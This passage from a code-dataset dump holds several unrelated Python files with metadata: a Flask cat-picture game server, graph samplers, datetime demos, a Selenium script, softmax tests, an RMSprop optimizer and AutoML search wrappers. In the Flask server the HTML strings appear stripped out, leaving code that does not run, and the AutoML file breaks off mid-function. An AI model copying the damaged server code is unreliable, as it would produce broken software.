583052, 700295, 800234, 925650,\n 156498, 292204, 471397, 599680, 704128, 807242, 936019,\n 157906, 313128, 499968, 616435, 724766, 810541, 940901,\n 186121, 325405, 524086, 637848, 725871, 826452, 941591,\n 198347, 330189, 528056, 640840, 740087, 829648, 957650,\n 209605, 343591, 543506, 647287, 740548, 858786, 966046,\n 230678, 354751, 559088, 677444, 748816, 875843, 980420 ]\n\nhappy = [ 103829, 230452, 295092, 449782, 629628, 753141, 933639, \n 140455, 235053, 328626, 460783, 651405, 767693, 949128, \n 201217, 236412, 403882, 520791, 700423, 853772, 963994, \n 227484, 255014, 442211, 553201, 742516, 899335 ]\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nconnection = Connection(app.config['MONGODB_HOST'],\n app.config['MONGODB_PORT'])\n\n#Database schema\nclass Player(Document):\n # __collection__ = 'players'\n # __database__ = 'happycat'\n # use_schemaless = True\n structure = {\n 'id': unicode,\n 'start': float,\n 'correct': int,\n 'time': float,\n 'round': int,\n 'best': float,\n 'last': float,\n 'count': int\n }\n indexes = [\n {\n 'fields':'id',\n 'unique':True,\n }]\n default_values = {\n 'time': float('Inf'),\n 'best': 0,\n 'last': 0,\n 'round': 1,\n 'count': 0\n }\n use_dot_notation = True\n\n#Register the document with connection\nconnection.register([Player])\ncollection = connection['happycat'].players\n\n@app.route(\"/\")\ndef main_page():\n return render_template('index.html')\n\n@app.route(\"/prizes\")\ndef prizes():\n return render_template('prizes.html')\n\n@app.route(\"/contact\")\ndef contact():\n return render_template('contact.html')\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html')\n\ndef santize_id(id):\n return id.split(\"@andrew.cmu.edu\")[0].lower()\n\n@app.route('/play/')\ndef start_game(id):\n # return str(collection.Player.find_one({'id': u'gauravt'}));\n id = santize_id(id)\n\n #Generate random images\n correct = happy[random.randint(0, len(happy)-1)]\n images = random.sample(grumpy, 17)\n images.append(correct)\n random.shuffle(images)\n\n p = collection.Player.find_and_modify(\n query={\"id\": id },\n update={\"$set\": { \n \"start\": time.time(),\n \"correct\": correct,\n }},\n new= True,\n upsert=True)\n\n if not 'round' in p:\n rnd = 1\n else:\n rnd = p['round']\n \n # if not p['round'] < 4:\n # p['time'] = 0.0\n # p['correct'] = 0\n # p['round'] = 1\n\n html = '
    '\n html += 'Round: ' + str(rnd) + '/3'\n html += '''\n
    \n

    Find the happy cat!

    \n
    \n\n
    \n '''\n\n for i in range(0,18):\n html += '''\n \"\n\n\n return str(html)\n\n@app.route('/check//')\ndef check(image=None, id=None):\n html = \"\"\n id = santize_id(id)\n correct = False\n\n if image and id:\n p = collection.Player.find_one({'id': id}); \n if p:\n # print image, p['correct']\n if not 'count' in p:\n p['count'] = 0\n \n if str(image) == str(p['correct']):\n correct = True\n # print \"Correct\"\n\n #count corrects\n p['count'] += 1\n # print p['count']\n else:\n p['count'] -= 1\n # print \"Not correct\"\n\n if not 'best' in p:\n p['best'] = 0.0\n\n if not 'last' in p:\n p['last'] = 0.0\n\n cur = time.time()\n elapsed = cur - p['start']\n\n if not 'time' in p:\n p['time'] = elapsed\n else:\n p['time'] += elapsed\n\n if not 'round' in p:\n p['round'] = 2\n else:\n p['round'] = p['round'] + 1\n \n if p['round'] > 3:\n #Done with final\n # print float(p['count']) / p['time']\n p['last'] = float(p['count']) / p['time']\n\n if 'best' in p:\n if p['best'] < p['last']:\n p['best'] = p['last']\n else:\n p['best'] = p['last']\n\n p['time'] = 0.0\n p['count'] = 0\n p['round'] = 1\n\n p.save()\n \n return str(correct) + \":\" + str(p['round'])\n\n@app.route('/score/')\ndef score(image=None, id=None):\n id = santize_id(id)\n p = collection.Player.find_one({'id': id});\n\n if not 'best' in p:\n p['best'] = 0.0\n\n if not 'last' in p:\n p['last'] = 0.0\n\n p.save()\n\n html = ''\n\n if p:\n if 'last' in p:\n html += '''\n
    \n

     

    \n
    \n
    \n

    \n '''\n\n html += \"Meow! You scored \" + str(round(p['last'], 2)) + \". Your best: \" + str(round(p['best'], 2)) + \".\" \n \n html += '''\n

    \n \n

    \n \n
    \n

     

    \n \n
    \n
    \n
    \n \n
    \n
    \n
    \n '''\n\n html += 'See leaderboard
    '\n\n return html\n\n@app.route('/leaderboard')\ndef get_leaderboard():\n leaders = list(collection.Player.find().sort([(\"best\", -1)]).limit(MAX_LEADERS))\n # leaders = list(collection.Player.find({'best': {'$exists': True}})._addSpecial( '\"$orderby\"', { 'best' : -1 } ))\n html = '''
    \n
    \n
    \n

    Leaderboard

    \n
    \n\n
    \n
    \n \n \n \n \n \n \n \n '''\n for l in leaders:\n html += \"\"\n html += \"\"\n html += \"\"\n html += \"\"\n\n html += \"
    PlayerScore
    \" + l['id'] + \"\" + str(l['best']) + \"
    \"\n html += '
    '\n \n return str(html)\n\n \nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"77534543","text":"from abc import ABC, abstractmethod\nfrom collections import deque\n\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\n\n\ndef generic_bfs_edges(G, source, batch_size,\n neighbors=None, depth_limit=None):\n \"\"\"\n Reference: https://networkx.github.io/documentation/stable/_modules/networkx/algorithms/traversal/breadth_first_search.html\n added batch_size to control size of bfs subgraph\n \"\"\"\n visited = {source}\n edges = []\n if depth_limit is None:\n depth_limit = len(G)\n queue = deque([(source, depth_limit, neighbors(source))])\n while queue:\n parent, depth_now, children = queue[0]\n try:\n child = next(children)\n if child not in visited:\n edges.append((parent, child))\n visited.add(child)\n if len(visited) == batch_size:\n break\n if depth_now > 1:\n queue.append((child, depth_now - 1, neighbors(child)))\n except StopIteration:\n queue.popleft()\n return visited, edges\n\n\nclass BaseSampler(ABC):\n def __init__(self, data, batch_size):\n self.id_map = data.dataset.id_map\n self.gs_map = data.dataset.gs_map\n self.interaction_combo_graph = data.dataset.interaction_combo_nxgraph\n self.batch_size = batch_size\n self.num_nodes = self.interaction_combo_graph.number_of_nodes()\n self.nodes_visited_counter = np.zeros(self.num_nodes)\n\n @abstractmethod\n def sample_next_training_batch(self):\n pass\n\n\nclass EverythingSampler(BaseSampler):\n \"\"\"\n Sample all the pairs in the data at once\n \"\"\"\n def __init__(self, data):\n super().__init__(data, 0)\n self.batch_size = len(data.dataset.train_pairs)\n self.data_loader = DataLoader(data, batch_size=self.batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n\n def sample_next_training_batch(self):\n try:\n sampled_pairs = next(self.data_iterable)\n except StopIteration:\n self.data_iterable = iter(self.data_loader)\n sampled_pairs = next(self.data_iterable)\n batch_gids = sampled_pairs.cpu().detach().numpy()\n sampled_gids = np.unique(batch_gids)\n return batch_gids, sampled_gids, None\n\n\nclass NeighborSampler(BaseSampler):\n \"\"\"\n Sample pairs based on a sampled subgraph\n \"\"\"\n def __init__(self, data, neighbor_size, batch_size):\n super().__init__(data, batch_size)\n self.neighbor_size = neighbor_size #float from 0 to 1 or int\n\n def neighbors_sampler(self, node):\n neighbors = list(self.interaction_combo_graph.neighbors(node))\n random.shuffle(neighbors)\n num_sample = self.neighbor_size if type(self.neighbor_size) == int else int(\n len(neighbors) * self.neighbor_size)\n neighbors = set(neighbors[:num_sample])\n return iter(neighbors)\n\n def sample_next_training_batch(self):\n sample_nodes, bfs_edges = self.recurse_sample_batch_size()\n subgraph = self.interaction_combo_graph.subgraph(sample_nodes).copy()\n batch_gids = np.asarray(list(map(lambda edge: (self.id_map[edge[0]], self.id_map[edge[1]]), subgraph.edges)))\n return batch_gids, [self.id_map[node] for node in sample_nodes], subgraph\n\n def recurse_sample_batch_size(self):\n sample_nodes = set()\n sample_edges = []\n while len(sample_nodes) < self.batch_size:\n batch_size = self.batch_size - len(sample_nodes)\n rand_node = random.randint(0, self.num_nodes - 1)\n while rand_node in sample_nodes or (np.any(self.nodes_visited_counter == 0) and self.nodes_visited_counter[rand_node] > 0):\n rand_node = random.randint(0, self.num_nodes - 1)\n self.nodes_visited_counter[rand_node] += 1\n bfs_nodes, bfs_edges = generic_bfs_edges(self.interaction_combo_graph, rand_node, batch_size,\n neighbors=self.neighbors_sampler)\n sample_nodes = sample_nodes.union(bfs_nodes)\n sample_edges.append(bfs_edges)\n return sample_nodes, sample_edges\n\n\nclass RandomSampler(BaseSampler):\n \"\"\"\n Randomly sampler pairs and take all induced pairs\n \"\"\"\n def __init__(self, data, batch_size, sample_induced=False):\n super().__init__(data, batch_size)\n self.data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n self.sample_induced = sample_induced\n\n def sample_next_training_batch(self):\n try:\n sampled_pairs = next(self.data_iterable)\n except StopIteration:\n self.data_iterable = iter(self.data_loader)\n sampled_pairs = next(self.data_iterable)\n if self.sample_induced:\n return self.sample_induced_pairs(sampled_pairs)\n else:\n batch_gids = sampled_pairs.cpu().detach().numpy()\n sampled_gids = np.unique(batch_gids)\n return batch_gids, sampled_gids, None\n\n def sample_induced_pairs(self, given_links):\n unique_gids = torch.unique(given_links).cpu().detach().numpy()\n ids = [self.gs_map[gid] for gid in unique_gids]\n subgraph = self.interaction_combo_graph.subgraph(ids)\n batch_gids = np.asarray(list(map(lambda edge: (self.id_map[edge[0]], self.id_map[edge[1]]), subgraph.edges)))\n sampled_gids = np.unique(batch_gids)\n unique_ids = np.unique(list(subgraph.edges))\n for uid in unique_ids:\n self.nodes_visited_counter[uid] += 1\n return batch_gids, sampled_gids, None\n\n\nclass RandomGraphSampler(BaseSampler):\n def __init__(self, data, batch_size):\n super().__init__(data, batch_size)\n self.data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n","sub_path":"src/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"344834348","text":"if __name__ == '__main__':\n import datetime\n\n today = datetime.date.today()\n print(today)\n print(repr(today))\n\n now = datetime.datetime.now()\n print(now)\n print(repr(now))\n\n\n from datetime import date\n\n\n bday = date(1993, 11, 24)\n print(bday.weekday())\n print(bday.isoweekday())\n\n\n from datetime import datetime, timedelta\n\n\n now = datetime.now() + timedelta(days=9)\n print(now)\n print(now.strftime('%a, %d. %b %Y'))\n print(now.strftime('%c'))\n print(now.strftime('%Z %X %f %j'))\n\n\n from datetime import datetime\n\n\n parsed = datetime.strptime(\n 'Wed Jun 13 14:47:12 2018',\n '%a %b %d %H:%M:%S %Y'\n )\n print(parsed.isoformat())\n\n\n from datetime import datetime\n\n\n # datetime.time does not allow math, so we use datetime\n a = datetime(2018, 6, 13, 14, 35)\n b = datetime(2018, 6, 13, 17, 22)\n\n print(b - a)\n\n\n from datetime import datetime\n\n\n a, b = datetime(2000, 2, 28, 23, 59), datetime(2000, 3, 1)\n c, d = datetime(2100, 2, 28, 23, 59), datetime(2100, 3, 1)\n\n print((b - a).days) # leap year\n print((d - c).days) # no leap year\n\n\n\n from datetime import datetime, timedelta\n\n\n now = datetime(2018,6,13,15,12,37)\n now = datetime.now()\n days137 = timedelta(days=137)\n\n print(now + days137)\n\n\n from datetime import datetime\n\n\n now = datetime.now()\n print(now.strftime('%c'))\n print(now.strftime('%a %b %#d %H:%M:%S %Y'))\n\n\n from datetime import datetime\n import locale\n\n\n locale.setlocale(locale.LC_ALL, 'de-DE')\n now = datetime.now() + timedelta(days=7,hours=9)\n print(now.strftime('%c'))\n print(now.strftime('%a %b %d %H:%M:%S %Y'))\n\n\n from datetime import datetime\n\n someday = datetime(2016,11,28,18,29,37)\n print(someday.strftime('%Y-%m-%dT%H:%M:%S'))\n print(someday.isoformat())\n\n\n from datetime import datetime\n\n\n a = datetime(2000, 2, 28, 23, 59)\n b = datetime(2000, 3, 1)\n print(type((b - a)))\n\n\n import math\n from datetime import datetime, timedelta\n\n\n begin = datetime(2018, 4, 3)\n end = datetime(2018, 7, 7)\n print(math.ceil((end - begin) / timedelta(weeks=1)))\n print(math.ceil((end - begin) / timedelta(weeks=2)))\n\n\n import parsedatetime as pdt\n\n\n cal = pdt.Calendar()\n time_struct, parse_status = cal.parse(\"hello\")\n print(time_struct)\n print(parse_status)\n\n\n\n import calendar\n\n\n calendar.prmonth(2018, 6)\n print(\"\\n\", calendar.monthcalendar(2018, 6))\n\n\n import time\n\n\n print(time.time())\n #time.sleep(2)\n print(\"I was delayed by 2 seconds!\")\n\n\n\n\n import random\n import time\n\n\n size = 10000\n seq = random.sample(range(10000000000), k=size)\n start = time.time()\n seq.sort()\n end = time.time()\n print(f\"It took {end - start: .3f} seconds to sort {size} numbers.\")\n\n\n\n import random\n import time\n\n\n def avg_performance(func, trials=100):\n results = []\n for i in range(trials):\n start = time.time()\n func()\n end = time.time()\n results.append(end-start)\n \n return sum(results) / trials\n\n #print(f\"Average of: {avg:.3f}s over {trials} trials.\")\n\n\n\n\n import timeit\n\n\n size = 100\n seq = random.sample(range(10000000000), k=size)\n print(timeit.timeit(seq.sort))\n\n\ndef func():\n \"~\".join(str(n) for n in range(100))","sub_path":"2018/10/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430873146","text":"from selenium import webdriver\r\n# all browsers expose an executable file.\r\n# through selenium test we need to invoke the executable file which will then invoke the actual browser\r\n# driver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\")\r\n\r\ndriver = webdriver.Firefox(executable_path=\"C:\\\\geckodriver.exe\")\r\n\r\ndriver.get(\"https://www.python.org/\") # get method to hit url on browser\r\n\r\ndriver.maximize_window()\r\n\r\nprint(driver.title) # print the title of the web page\r\n\r\nprint(driver.current_url) # to check if we landed on correct web address\r\n\r\ndriver.get(\"https://www.python.org/doc/\")\r\n\r\ndriver.back()\r\n\r\ndriver.minimize_window()\r\n\r\ndriver.close() # closes the browser window. driver.quit() will quit all the windows that are open for automated tests\r\n\r\n","sub_path":"PythonSelenium/BrowserDemo.py","file_name":"BrowserDemo.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"552867261","text":"import unittest\n\nimport numpy as np\n\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal\nfrom src.softmax_regressor import CustomSoftmaxRegressor\n\n\nclass TestSoftmaxRegression(unittest.TestCase):\n\n def setUp(self):\n self.clf = CustomSoftmaxRegressor()\n\n def test_softmax_score(self):\n X = np.asarray(\n [[1, 2, 3],\n [5, 2, 1],\n [4, 2, 5],\n [2, 5, 1]]\n )\n theta = np.asarray(\n [[1, 1, 1],\n [1, 5, 6]]\n )\n\n # theta * X'\n result = np.asarray(\n [[6, 8, 11, 8],\n [29, 21, 44, 33]]\n )\n\n self.clf.weights = theta # simulate training\n self.clf.num_classes = np.shape(theta)[0]\n for i in range(self.clf.num_classes):\n assert_array_equal(result[i, :], self.clf._softmax_score(X, i))\n\n def test_compute_cost(self):\n X = np.asarray(\n [[1.4, 1.2, 4.0, 2.4],\n [6.1, 4.1, 2.3, 3.3],\n [4.5, 4.2, 1.24, 2.4]]\n )\n theta = np.asarray(\n [[1, 1, 4, 5],\n [2, 4, 5, 5]]\n )\n # 2 classes\n Y = np.asarray(\n [[1, 0],\n [0, 1],\n [0, 1]]\n )\n\n cost = 3.000041\n self.clf.weights = theta # simulate training\n self.clf.num_classes = np.shape(theta)[0]\n assert_array_almost_equal(cost, self.clf._compute_cost(X, Y))\n\n def test_softmax_proba(self):\n X = np.asarray(\n [[6, 1, 5],\n [1, 5, 2],\n [2, 1, 5],\n [6, 7, 4]]\n )\n theta = np.asarray(\n [[2, 5, 6],\n [1, 2, 5],\n [3, 1, 3]]\n )\n proba = np.asarray(\n [[0.999, 8.315e-07, 2.26e-06],\n [0.999, 1.523e-08, 1.38e-11],\n [0.999, 4.539e-05, 4.13e-08],\n [1, 3.442e-14, 1.71e-15]]\n )\n\n self.clf.theta = theta\n assert_array_almost_equal(proba, self.clf.predict_proba(X), decimal=3)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Chapter04/test/test_softmax_regressor.py","file_name":"test_softmax_regressor.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360155110","text":"import numpy as np\n\n\nclass RMSprop:\n \n def __init__(self, fn, fn_grad):\n self.fn = fn\n self.fn_grad = fn_grad\n \n # http://ruder.io/optimizing-gradient-descent/index.html#rmsprop\n def run(self, x_init, y_init, n_iter, lr = 0.001, beta = .9, tol= 1e-5, epsilon = 1e-8):\n x, y = x_init,y_init\n z = self.fn(x, y)\n\n x_path = []\n y_path = []\n z_path = []\n\n x_path.append(x)\n y_path.append(y)\n z_path.append(z)\n\n dx, dy = self.fn_grad(self.fn, x, y)\n \n dx_sq = dx**2\n dy_sq = dy**2\n\n for i in range(n_iter):\n if np.abs(dx) < tol or np.isnan(dx) or np.abs(dy) < tol or np.isnan(dy):\n break\n \n dx, dy = self.fn_grad(self.fn, x, y)\n \n dx_sq = beta * dx_sq + (1 - beta) * dx * dx\n dy_sq = beta * dy_sq + (1 - beta) * dy * dy\n\n x += - lr * dx / np.sqrt(dx_sq + epsilon)\n y += - lr * dy / np.sqrt(dy_sq + epsilon)\n \n x_path.append(x)\n y_path.append(y)\n z = self.fn(x, y)\n z_path.append(z)\n\n if np.isnan(dx) or np.isnan(dy):\n print('\\033[1m RMSprop \\033[0m \\nExploded')\n elif np.abs(dx) < tol and np.abs(dy) < tol:\n print('\\033[1m RMSprop \\033[0m \\nDid not converge')\n else:\n print('\\033[1m RMSprop \\033[0m \\nConverged in {} steps. \\nLoss fn {:0.4f} \\nAchieved at coordinates x,y = ({:0.4f}, {:0.4f})'.format(i, z, x, y))\n\n self.z_path_RMSprop = z_path\n self.z_RMSprop = z\n \n return x_path,y_path,z_path\n \n \n","sub_path":"unconstrained_optimization/RMSprop.py","file_name":"RMSprop.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"193773092","text":"\nfrom bottle import post, run, request\nimport threading\nimport time\n\n\ncount = 0\n\n@post('/')\ndef index():\n global count\n count += int(request.body.read())\n return b''\n\n\ndef show():\n prev = 0\n while True:\n start = time.time()\n time.sleep(1)\n now = time.time()\n dur = now - start\n print(int((count - prev) / dur), 'ops')\n start = now\n prev = count\n\nthreading.Thread(target=show).start()\nrun(host='localhost', port=7000, quiet=True)\n","sub_path":"example/benchmark/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"208470404","text":"from five import grok\nfrom opengever.meeting.model import Committee\nfrom opengever.meeting.model import Member\nfrom opengever.meeting.model import Membership\nfrom plone import api\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\nclass CommitteeVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.CommitteeVocabulary')\n\n def __call__(self, context):\n terms = []\n\n for committee in self.get_committees():\n terms.append(SimpleTerm(value=committee,\n token=committee.committee_id,\n title=committee.title))\n return SimpleVocabulary(terms)\n\n def get_committees(self):\n return Committee.query.all()\n\n\nclass ActiveCommitteeVocabulary(CommitteeVocabulary):\n grok.name('opengever.meeting.ActiveCommitteeVocabulary')\n\n def get_committees(self):\n return Committee.query.active().all()\n\n\nclass MemberVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.MemberVocabulary')\n\n def __call__(self, context):\n terms = []\n\n for member in Member.query.order_by(Member.fullname):\n terms.append(SimpleTerm(value=member,\n token=member.member_id,\n title=member.fullname))\n return SimpleVocabulary(terms)\n\n\n@grok.provider(IContextSourceBinder)\ndef get_committee_member_vocabulary(meetingwrapper):\n meeting = meetingwrapper.model\n members = []\n for membership in Membership.query.for_meeting(meeting):\n member = membership.member\n members.append(\n SimpleVocabulary.createTerm(\n member,\n str(member.member_id),\n member.get_title(show_email_as_link=False)))\n\n return SimpleVocabulary(members)\n\n\nclass LanguagesVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.LanguagesVocabulary')\n\n def __call__(self, context):\n ltool = api.portal.get_tool('portal_languages')\n languages = [code.split('-')[0]\n for code in ltool.getSupportedLanguages()]\n\n return SimpleVocabulary(\n [SimpleTerm(language) for language in languages])\n","sub_path":"opengever/meeting/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"593095640","text":"\nimport pandas\nfrom celery.result import allow_join_result\nfrom scipy.sparse.csr import csr_matrix\n\nfrom tworaven_apps.solver_interfaces.models import \\\n R_SERVICE, KEY_SUCCESS, KEY_MESSAGE, KEY_DATA\n\nfrom tworaven_solver import Dataset, preprocess\nfrom tworaven_apps.solver_interfaces.util_model import ModelSklearn, ModelH2O, ModelLudwig\nimport uuid\nimport abc\nimport requests\nfrom celery import group\nimport multiprocessing\nimport os\n\nfrom time import sleep\n\n\nclass Search(object):\n system = None\n\n def __init__(self, specification,\n callback_found: str, callback_arguments=None,\n system_params=None, search_id=None):\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n if callback_found not in FOUND_MODEL_CALLBACKS:\n raise ValueError(f'Callback {callback_found} is not found in the list of available model callbacks.')\n\n if search_id is None:\n search_id = self.get_search_id()\n\n self.search_id = search_id\n self.specification = specification\n self.system_params = system_params\n self.callback_found = callback_found\n self.callback_arguments = callback_arguments or {}\n\n @staticmethod\n def get_search_id():\n return str(uuid.uuid4())\n\n @abc.abstractmethod\n def run(self):\n pass\n\n @staticmethod\n def load(system, specification,\n callback_found: str, callback_arguments=None,\n system_params=None, search_id=None):\n return {\n 'auto_sklearn': SearchAutoSklearn,\n 'caret': SearchCaret,\n 'h2o': SearchH2O,\n 'tpot': SearchTPOT,\n 'mljar-supervised': SearchMLJarSupervised,\n 'ludwig': SearchLudwig,\n 'mlbox': SearchMLBox,\n 'TwoRavens': SearchTwoRavens\n }[system](\n specification=specification,\n callback_found=callback_found,\n callback_arguments=callback_arguments,\n system_params=system_params,\n search_id=search_id)\n\n\nclass SearchAutoSklearn(Search):\n system = 'auto_sklearn'\n\n def run(self):\n import autosklearn.classification\n import autosklearn.regression\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n dataframe.reset_index(drop=True, inplace=True)\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n x = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n # if os.path.exists(tmp_folder):\n # shutil.rmtree(tmp_folder)\n # if os.path.exists(output_folder):\n # shutil.rmtree(output_folder)\n\n # TODO: auto_sklearn has a bug with weak references when certain non-default options are used.\n # Just avoiding this bug for now\n # if 'configuration' in self.specification:\n # config = self.specification['configuration']\n #\n # self.system_params['resampling_strategy_arguments'] = self.system_params.get('resampling_strategy_arguments', {})\n # self.system_params['resampling_strategy_arguments']['shuffle'] = config.get('shuffle', False)\n #\n # if config['method'] == \"HOLDOUT\":\n # self.system_params['resampling_strategy'] = 'holdOut'\n # self.system_params['resampling_strategy_arguments']['train_size'] = max(0, config.get('trainTestRatio')) or .6\n #\n # if config['method'] == \"K_FOLD\":\n # self.system_params['resampling_strategy'] = 'cv'\n # self.system_params['resampling_strategy_arguments']['folds'] = config.get('folds') or 10\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['time_left_for_this_task'] = self.specification.get('timeBoundSearch')\n\n if self.specification.get('timeBoundRun'):\n self.system_params['per_run_time_limit'] = self.specification.get('timeBoundRun')\n # sklearn_temp_path = '/ravens_volume/solvers/auto_sklearn/temporary/' + str(uuid.uuid4())\n # tmp_folder = os.path.join(*sklearn_temp_path.split('/'), 'temp')\n # output_folder = os.path.join(*sklearn_temp_path.split('/'), 'output')\n\n # self.system_params['tmp_folder'] = tmp_folder\n # self.system_params['output_folder'] = output_folder\n # self.system_params['delete_tmp_folder_after_terminate'] = False\n\n # turn off daemon flag from the currently running process, to allow child processes from auto_sklearn fit\n multiprocessing.current_process()._config['daemon'] = False\n self.system_params['n_jobs'] = 1\n\n # valid system params\n # https://automl.github.io/auto-sklearn/master/api.html#api\n automl = {\n 'REGRESSION': autosklearn.regression.AutoSklearnRegressor,\n 'CLASSIFICATION': autosklearn.classification.AutoSklearnClassifier\n }[self.specification['problem']['taskType']](**self.system_params)\n\n automl.fit(stimulus.copy(), dataframe[y].copy())\n\n # if self.system_params.get('resampling_strategy') == 'cv':\n automl.refit(stimulus, dataframe[y])\n\n model = ModelSklearn(\n automl,\n system='auto_sklearn',\n search_id=self.search_id,\n predictors=x,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'auto_sklearn'\n }\n }\n\n\nclass SearchCaret(Search):\n system = 'caret'\n\n def run(self):\n return requests.post(R_SERVICE + 'caretSolve.app', json={\n 'search_id': self.search_id,\n 'specification': self.specification,\n 'system_params': self.system_params\n }).json()\n\n\nclass SearchH2O(Search):\n system = 'h2o'\n\n def run(self):\n import h2o\n from h2o.automl import H2OAutoML\n\n # ensure backend solver is running\n h2o.init()\n\n train = h2o.import_file(Dataset(self.specification['input']).get_resource_uri())\n test = None\n\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n if self.specification['problem']['taskType'] == 'CLASSIFICATION':\n if train.types[y] == u'real':\n train[y] = train[y].ascharacter()\n # For classification, response should be a factor\n train[y] = train[y].asfactor()\n\n if 'configuration' in self.specification:\n config = self.specification['configuration']\n\n if config['method'] == \"HOLDOUT\":\n train, test = train.split_frame(\n ratios=[max(0, config.get('trainTestRatio')) or .6],\n seed=config.get('randomSeed'))\n\n if config['method'] == \"K_FOLD\":\n self.system_params['nfolds'] = config.get('folds') or 10\n\n self.system_params['balance_classes'] = config.get('stratified', False)\n\n if 'timeBoundSearch' in self.specification:\n self.system_params['max_runtime_secs'] = self.specification['timeBoundSearch']\n if 'timeBoundRun' in self.specification:\n self.system_params['max_runtime_secs_per_model'] = self.specification['timeBoundRun']\n if 'rankSolutionsLimit' in self.specification:\n self.system_params['max_models'] = self.specification['rankSolutionsLimit']\n\n # sort_metrics = {\n # 'ACCURACY': \"rmse\",\n # 'ROC_AUC': \"auc\",\n # 'MEAN_SQUARED_ERROR': \"mse\",\n # 'ROOT_MEAN_SQUARED_ERROR': \"rmse\",\n # 'MEAN_ABSOLUTE_ERROR': \"mae\",\n # 'LOSS': \"logloss\",\n # }\n # if 'performanceMetric' in self.specification:\n # metric_spec = self.specification['performanceMetric']\n # if metric_spec['metric'] in sort_metrics:\n # self.system_params['sort_metric'] = sort_metrics[metric_spec['metric']]\n # self.system_params['stopping_metric'] = sort_metrics[metric_spec['metric']]\n\n # CV models are useful for model comparisons\n # self.system_params['keep_cross_validation_models'] = True\n\n if 'CLASSIFICATION' in self.specification['problem']['taskType']:\n train[y] = train[y].asfactor()\n\n train_params = {\n \"x\": X,\n \"y\": y,\n \"training_frame\": train\n }\n if test:\n train_params['leaderboard_frame'] = test\n\n automl = H2OAutoML(**self.system_params)\n automl.train(**train_params)\n\n if not automl.leader:\n return {\n KEY_SUCCESS: False,\n KEY_MESSAGE: 'no models found',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'h2o'\n }\n }\n\n leaderboard = automl.leaderboard\n\n # take up to 10 models\n for model_id in leaderboard.head(10).as_data_frame()['model_id']:\n model = ModelH2O(\n h2o.get_model(model_id),\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n task=self.specification['problem']['taskType'])\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'h2o'\n }\n }\n\n\nclass SearchTPOT(Search):\n system = 'tpot'\n\n def run(self):\n import tpot\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n self.system_params['config_dict'] = 'TPOT sparse'\n\n # if 'configuration' in self.specification:\n # config = self.specification['configuration']\n #\n # if config['method'] == \"HOLDOUT\":\n # self.system_params['cv'] =\n #\n # if config['method'] == \"K_FOLD\":\n # self.system_params['cv'] =\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['max_time_mins'] = self.specification.get('timeBoundSearch') / 60.\n\n if self.specification.get('timeBoundRun'):\n self.system_params['max_eval_time_mins'] = self.specification.get('timeBoundRun') / 60.\n\n # custom scorers cause unidentified SIGSEGV upon exit of search\n # scorer = make_scorer(\n # get_metric(self.specification['performanceMetric']),\n # 